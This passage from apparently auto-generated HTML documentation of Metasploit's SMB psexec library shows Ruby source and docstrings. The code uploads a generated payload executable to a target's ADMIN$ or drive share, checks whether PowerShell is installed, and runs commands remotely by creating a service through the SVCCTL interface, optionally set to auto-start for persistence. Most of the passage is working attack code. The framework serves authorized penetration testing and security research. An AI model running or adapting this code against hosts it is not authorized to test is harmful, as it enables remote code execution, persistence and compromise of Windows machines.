||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>.[\\\/]</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_subfolder'>subfolder</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_dup'>dup</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^[\\\/]</span><span class='regexp_end'>/</span></span><span class='comma'>,</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_folder_list'>folder_list</span> <span class='op'>=</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>[\\\/]</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_fileprefix'>fileprefix</span> <span class='op'>=</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='lbracket'>[</span><span class='int'>1</span><span class='op'>..</span><span class='op'>-</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_a'>a</span><span class='op'>|</span> <span class='id identifier rubyid_a'>a</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\</span><span class='tstring_end'>"</span></span><span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\\$</span><span class='regexp_end'>/</span></span><span class='comma'>,</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>></span> <span class='int'>1</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_subfolder'>subfolder</span> <span class='op'>=</span> <span class='kw'>false</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span> <span class='symbol'>:servicename</span> <span class='op'>=></span> <span class='id identifier rubyid_service_name'>service_name</span><span class='comma'>,</span> <span class='symbol'>:serviceencoder</span> <span class='op'>=></span> <span class='id identifier rubyid_service_encoder'>service_encoder</span><span class='rbrace'>}</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_payload_exe_service'>generate_payload_exe_service</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'><<</span> <span class='id identifier rubyid_exe'>exe</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_subfolder'>subfolder</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='comment'># Disconnect from the share
|
||
</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='comment'># define the file location
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>%SYSTEMROOT%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>elsif</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^[a-zA-Z]\$$</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_slice'>slice</span><span class='lparen'>(</span><span class='int'>0</span><span class='comma'>,</span><span class='int'>1</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>:\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\127.0.0.1\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_file_location'>file_location</span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Deleting \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='comment'>#This is not really useful but will prevent double \\ on the wire :)
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>.[\\\/]</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../Client.html#XCEPT-constant" title="Msf::Exploit::Remote::SMB::Client::XCEPT (constant)">XCEPT</a></span></span><span class='op'>::</span><span class='const'>ErrorCode</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Delete of \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../Client.html#XCEPT-constant" title="Msf::Exploit::Remote::SMB::Client::XCEPT (constant)">XCEPT</a></span></span><span class='op'>::</span><span class='const'>ErrorCode</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Delete of \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="powershell_installed?-instance_method">
|
||
|
||
#<strong>powershell_installed?</strong>(smb_share, psh_path) ⇒ <tt>Boolean</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
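<div class="discussion">
<p>Checks whether <tt>powershell.exe</tt> exists on the target by connecting to <tt>smb_share</tt> and testing for the file. For the <tt>ADMIN$</tt> and <tt>C$</tt> shares (compared case-insensitively) a fixed <tt>System32\WindowsPowerShell\v1.0</tt> path is checked; for any other share <tt>psh_path</tt> is checked as given. The share is disconnected again before the result is returned.</p>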
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 195</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_powershell_installed?'>powershell_installed?</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_psh_path'>psh_path</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_share'>share</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
|
||
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>System32\\WindowsPowerShell\\v1.0\\powershell.exe</span><span class='tstring_end'>'</span></span>
|
||
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>C$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</span><span class='tstring_end'>'</span></span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='id identifier rubyid_psh_path'>psh_path</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Checking for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_path'>path</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_smb_file_exist?'>smb_file_exist?</span><span class='lparen'>(</span><span class='id identifier rubyid_path'>path</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>PowerShell found</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>PowerShell not found</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span> <span class='op'>=</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="psexec-instance_method">
|
||
|
||
#<strong>psexec</strong>(command, disconnect = true) ⇒ <tt>Boolean</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
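<p>Executes a single Windows command on the remote host by creating a service through the Service Control Manager (SVCCTL over the <tt>IPC$</tt> share), with <tt>command</tt> passed as the path the service runs. When the <tt>SERVICE_PERSIST</tt> datastore option is set, the service is created with <tt>SERVICE_AUTO_START</tt>.</p>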
|
||
|
||
<p>If you want to retrieve the output of your command you’ll have to echo it to a .txt file and then use the <span class='object_link'><a href="#smb_read_file-instance_method" title="Msf::Exploit::Remote::SMB::Client::Psexec#smb_read_file (method)">#smb_read_file</a></span> method to retrieve it. Make sure to remove the files manually or use <span class='object_link'><a href="../../../FileDropper.html#register_files_for_cleanup-instance_method" title="Msf::Exploit::FileDropper#register_files_for_cleanup (method)">FileDropper#register_files_for_cleanup</a></span> to have the <span class='object_link'><a href="../../../FileDropper.html#cleanup-instance_method" title="Msf::Exploit::FileDropper#cleanup (method)">FileDropper#cleanup</a></span> and <span class='object_link'><a href="../../../FileDropper.html#on_new_session-instance_method" title="Msf::Exploit::FileDropper#on_new_session (method)">FileDropper#on_new_session</a></span> handlers do it for you.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>command</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Should be a valid Windows command</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>disconnect</span>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
<em class="default">(defaults to: <tt>true</tt>)</em>
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Disconnect afterwards</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
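<p>Whether everything went well; for example, <tt>false</tt> is returned when no service manager handle is obtained or when creating the service fails with <tt>ERROR_ACCESS_DENIED</tt></p>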
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 98</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_disconnect'>disconnect</span><span class='op'>=</span><span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_remove_socket'>remove_socket</span><span class='lparen'>(</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_sock'>sock</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\IPC$</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_handle'>handle</span> <span class='op'>=</span> <span class='id identifier rubyid_dcerpc_handle_target'>dcerpc_handle_target</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>367abb81-9844-35f1-ad32-98f038001003</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>2.0</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ncacn_np</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\svcctl</span><span class='tstring_end'>"</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Binding to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='embexpr_end'>}</span><span class='tstring_content'> ...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_dcerpc_bind'>dcerpc_bind</span><span class='lparen'>(</span><span class='id identifier rubyid_handle'>handle</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Bound to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='embexpr_end'>}</span><span class='tstring_content'> ...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Obtaining a service manager handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC.html" title="Rex::Proto::DCERPC (module)">DCERPC</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL.html" title="Rex::Proto::DCERPC::SVCCTL (module)">SVCCTL</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL/Client.html" title="Rex::Proto::DCERPC::SVCCTL::Client (class)">Client</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL/Client.html#initialize-instance_method" title="Rex::Proto::DCERPC::SVCCTL::Client#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_dcerpc'>dcerpc</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_scm_status'>scm_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_openscmanagerw'>openscmanagerw</span><span class='lparen'>(</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_scm_status'>scm_status</span> <span class='op'>==</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>ERROR_ACCESS_DENIED opening the Service Manager</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>return</span> <span class='kw'>false</span> <span class='kw'>unless</span> <span class='id identifier rubyid_scm_handle'>scm_handle</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span> <span class='symbol'>:start</span> <span class='op'>=></span> <span class='const'><span class='object_link'><a href="../../../Windows_Constants.html#SERVICE_AUTO_START-constant" title="Msf::Exploit::Windows_Constants::SERVICE_AUTO_START (constant)">SERVICE_AUTO_START</a></span></span> <span class='rbrace'>}</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Creating the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
